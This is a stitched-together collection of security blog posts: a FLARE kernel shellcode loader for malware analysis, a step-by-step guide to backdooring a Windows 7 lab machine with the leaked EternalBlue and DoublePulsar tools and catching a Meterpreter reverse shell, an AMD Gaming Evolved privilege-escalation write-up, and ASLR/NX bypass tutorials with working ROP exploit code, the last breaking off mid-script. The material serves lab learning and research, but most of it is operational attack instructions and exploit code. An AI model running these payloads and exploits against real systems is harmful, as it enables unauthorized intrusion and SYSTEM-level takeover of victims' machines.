Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.


Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.

Wrap-Up

We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

From git clone to Pwned — Owning Windows with DoublePulsar and EternalBlue

By now, you’ve likely heard about the Shadow Brokers and their alleged NSA tool dump. Regardless of whether you believe it was or was not the toolset of a nation-state actor, at least one thing is true: this stuff works, and it works well.

In this blog series I’ll walk through some of what I’ve learned from the dump, focusing specifically on two tools: Eternal Blue, a tool for backdooring Windows via MS17-010, and DoublePulsar, an exploit that allows you to inject DLLs through the established backdoor, or inject your own shellcode payload. In this first post, we’ll walk through setting up the environment and getting the front-end framework, Fuzzbunch, to run.

tl;dr — sweet nation-state level hax, remote unauthenticated attacks that pop shells as NT AUTHORITY\System. Remember MS08-067? Yeah, like that.

Setting up the environment

  1. To get going, fire up a Windows 7 host in a virtual machine. Dont worry about the specs; all of my research and testing has been done in a Virtualbox VM with 1GB ram, 1 CPU core, and a 25GB hard drive.
  2. First and foremost, git clone (or download the zip) of the Shadowbrokers Dump. You should be able to grab it from x0rz’ github.
  3. The exploits run through a framework not entirely unlike Metasploit. The framework itself runs in Python, so we need to grab a copy of Python 2.6 for Windows. If you catch yourself wondering why you’re installing a 9 year old copy of Python, remember that the dump is from 2013, and the tools had been in use for a while. Fire up the DeLorean because we’re about to go way back.
  4. Add Python to your environmental path by going to Control Panel > System > Advanced System Settings > Environmental Variables and add C:\Python26 to the PATH field.
  5. Because you’re running Python on Windows, there are a bunch of dependencies you’ll need to install. The easiest way to overcome this is to install the Python for Windows Extensions, also known as PyWin. Grab a copy of PyWin 2.6 here.
  6. PyWin will very likely fail on its final step. No problem: open an administrator command prompt, cd C:\python26\scripts and run python pywin32_postinstall.py --install. Python and its dependencies should now be installed.
  7. We’re now ready to launch the Fuzzbunch Framework. Navigate to the folder you downloaded the exploits, and cd windows. You’ll need to create a folder called listeningposts or the next step will fail; so, mkdir listeningposts.
  8. You should now be able to launch Fuzzbunch — use python fb.py to kick it off.

Thats about it to get the software running. You’ll be asked a few questions, such as your Target IP, Callback IP (your local IP address), and whether you want to use Redirection. For now, choose no. Fuzzbunch will ask for a Logs directory — this is a pretty cool feature that stores your attack history and lets you resume from where you left off. Create a Logs directory somewhere.

At this point I’d encourage you to explore the interface; its fairly intuitive, sharing many commands with Metasploit (including help and ? — hint hint). In the next post, we’ll launch an actual attack through Meterpreter and Powershell Empire DLLs.

By now, your environment is configured, you’ve been able to launch the Fuzzbunch framework, and you’re probably ready to hack something. In this article we’ll go through the process of using EternalBlue to create a backdoor. I’m going to make the following assumptions:

  1. You have configured a local VM network with 1 Windows attack machine and 1 Windows 7 victim machine.
  2. You have gone through the first blog post and can launch the Fuzzbunch framework.
  3. You have basic command of the Windows operating system and command line.

For reference, in my lab environment, this is the setup:

  1. Attacker Box — 10.0.2.5. Windows 7 SP1 x64.
  2. Kali Box — 10.0.2.15. Kali Rolling. (We’ll use this in Part 3)
  3. Victim Box — 10.0.2.7. Windows 7 SP1 x64, without the MS17-010 patches applied.

In the next tutorial we’re going to use the DLL injection function in DoublePulsar — however, the first step in this process is to backdoor the Victim with Eternal Blue. Launch Fuzzbunch, and enter the following:

Default Target IP Address []: 10.0.2.7
Default Callback IP Address []: 10.0.2.5
Use Redirection [yes]: no
Base Log directory [D:\logs]: c:\fb_logs

If you have run Fuzzbunch in the past, you may see a list of projects. If this is your first run, you’ll see a prompt to select or create a new project. Select [0] to create a new project. Give it a name, and you should see something like this:

Time to backdoor our Windows box. Remember that exploits run through EternalBlue (the backdoor itself), so this is a critical step.

  1. Type use eternalblue
  2. Fuzzbunch populates your options with defaults. The good news is, this is mostly correct out of the box. It’ll ask if you want to be prompted for variables — lets go through this, as there is one default we’re going to change. Types yes or hit enter to continue.
  3. NetworkTimeout [60]: This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
  4. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.
  5. TargetPort [445]: EternalBlue targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
  6. VerifyTarget [True]: You can set this to False to speed things up — but its a good idea to verify the target exists and is vulnerable before firing things off.
  7. VerifyBackdoor [True]: Verify that your backdoor exploit actually succeeds.
  8. MaximumExploitAttempts [3]: How many times should EternalBlue attempt to install the backdoor? I have seen EternalBlue fail the first attempt and succeed the second — so I’d recommend leaving it at 3.
  9. GroomAllocations [12]: The number of SMB Buffers to use. Accept the defaults.
  10. Target [WIN72K8R2]: In our example, we’re targetting Windows 7. If you’re using XP, select the appropriate option.
  11. Mode :: Delivery Mechanism [FB]: We’re going to use Fuzzbunch. In a future post, we’ll discuss DARINGNEOPHYTE.
  12. Fuzzbunch Confirmation: This confirms that you want to use Fuzzbunch.
  13. Destination IP [10.0.2.7]: This is for your local tunnel. In our example, keep it as default
  14. Destination Port [445]: As per above, this is for your local tunnel. Accept the default.
  15. You should now see a summary of the configured EternalBlue module, as seen below:

Everything look good? Hit enter, and we’ll see Fuzzbunch backdoor the victim machine. This happens quick, but the authors have made a point of a celebratory =-=-=WIN=-=-= banner.

Here’s the exploit in its entirety, from answering yes to a successful backdoor.

Note that EternalBlue checks for the existance of a backdoor before continuing. If you see =-=-=-=-=WIN=-=-=-=-= toward the end, and a green [+] Eternalblue Succeeded message then congratulations! You’ve just launched a nation state exploit against an unsuspecting lab machine. I’d suggest running through these steps again, right away, to see how things play out when you try to backdoor a box that has already been backdoored with EternalBlue. In the next post, we’ll pop a Meterpreter shell as NT Authority\System in minutes flat.

To recap where we are so far: You’ve installed Python 2.6 and its prerequisites. You can launch Fuzzbunch without errors, and you’ve backdoored your Victim box. You have a Windows Attack box, a Windows Victim Box, and a Kali box — and all three are on the same network and can communicate with each other. Please revisit the previous posts if this doesn’t describe your situation. Otherwise, lets hack things.

Now that we have a backdoor installed, we’re going to inject a Meterpreter DLL into a running process on your victim machine, and get a shell as NT Authority\System, the equivalent of root on a Windows box. For this section of the process, I’ll assume the following:

  1. You are familiar with the Linux command line.
  2. You have basic familairity with Metasploit, specifically the msfconsole and msvenom tools. If you arent familiar with these, Offensive Security’s Metasploit Unleashed is a great primer available for free.
  3. You have backdoored your Victim box successfully.

Creating the Meterpreter payload and starting your Kali listener
Let’s start by creating a malicious DLL file. The DLL we create is going to run the payload windows/x64/meterpreter/reverse_tcp which creates a 64-bit Meterpreter Reverse TCP connection to an IP address we specify. As noted in Part 2, my Kali system is located at 10.0.2.15.

  1. Use the following command to generate the DLL: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9898 -f dll -o meterpreter.dll. This uses the payload mentioned, connecting back to 10.0.2.15, on port 9898. It uses the DLL format and outputs the payload to a file called meterpreter.dll.
  2. Copy the DLL over to your Windows Attack box. How you do this is up to you, but a quick and dirty way is to run python -m SimpleHTTPServer on your Kali box, and use a web browser from the Windows Attack box to browse to http://10.0.2.15:8000 and download it directly.
  3. Start up msfconsole on Kali and use exploit/multi/handler. We’re going to catch our shell here — so use the parameters you set in the DLL by typing set LPORT 9898. You can probably get away without setting the LHOST, but if you want to be sure, type set LHOST 10.0.2.15 as well. Finally, I had some issues with the exploit failing when I didnt set a payload manually. Avoid that by typing set PAYLOAD windows/x64/meterpreter/reverse_tcp. Lastly, type exploit to start your listener. Lots of info in this step, so here’s what you should see:
  1. If everything looks good, its time to go back to the Windows Attack box. Fire up Fuzzbunch if its not already running, and use doublepulsar.

Injecting the DLL and catching a shell

Like EternalBlue, DoublePulsar will attempt to fill in default module settings for you. We’re going to change things, so when you see Prompt for Variable Settings? [Yes]:, hit enter.

  1. NetworkTimeout [60]: This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
  2. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.
  3. TargetPort [445]: DoublePulsar targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
  4. Protocol: Since we’re using SMB here, make sure SMB is selected.
  5. Architecture: Make sure you have this set correctly. If you use x86 on an x64 box, you’ll get a blue screen of death.
  6. Function: DoublePulsar can run shellcode, or run a DLL. Select 2 to Run a DLL.
  7. DllPayload []: This is the full path to your Meterpreter DLL; for example, C:\temp\meterpreter.dll
  8. DllOrdinal [1]: DLL files call functions by ordinal numbers instead of names. Unfortunately this is out of my scope of knowledge — in my experimentation, I used trial and error until an ordinal number worked. In this case, set your ordinal to 1. If 1 is incorrect, you’ll quickly find out via a blue screen of death, nothing happening at all, or the RPC server on the Victim box crashing. Know a great way to determine the ordinal? Please drop me a line.
  9. ProcessName [lsass.exe]: The process name you’ll inject into. This is your call — pick something run as NT Authority\System, that is also unlikely to crash when disturbed, and is likely to exist and be running on the Victim machine. DoublePulsar uses lsass.exe by default — this works fine, but some Meterpreter actions (such as hashdump) will likely cause it to crash. You can consider spoolsv.exeSearchIndexer.exe, and lsm.exe as well — experiement a bit with this field.
  10. ProcessCommand []: Optional, the process command line to inject into. Leave this blank.
  11. Destination IP [10.0.2.7]: Local tunnel IP. For this scenario, leave it as default.
  12. Destination Port [445]: Local tunnel port. Again, we’ll leave this default.

You should now have a summary of the changes you’ve made, which should look like this:

If everything looks good, hit enter to launch your exploit. DoublePulsar will connect, check on the EternalBlue backdoor, and inject the DLL. You should see a [+] Doublepulsar Succeeded message. Here’s what the attack looks like from your Windows box:

And now the good part — open up your Kali box. If everything has gone well, you’ve now got a meterpreter session open, and you should have NT Authority\Systemw00t!

In the next post, we’ll do the same thing with PowerShell Empire. Sick of the Red Team stuff? Coming up are event viewer logs for each of the steps described, PCAPs of each attack, and an analysis of what hits the disk when you launch EternalBlue and DoublePulsar.

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years, I update my AMD drivers and notice plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boiler plate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python based and has been packaged with something like py2exe. While decompiling python byte code is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python byte-code in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!” . At first glance it appears to be an error message if certain python objects aren’t created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success, only one zip file exists and it is named python35.zip! It’s filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled bytecode python files which I presume to be the applications core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephermal port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command function, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.

The function logic is pretty straight forward. It performs a couple insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

 

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

 

 

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

 

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

 

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

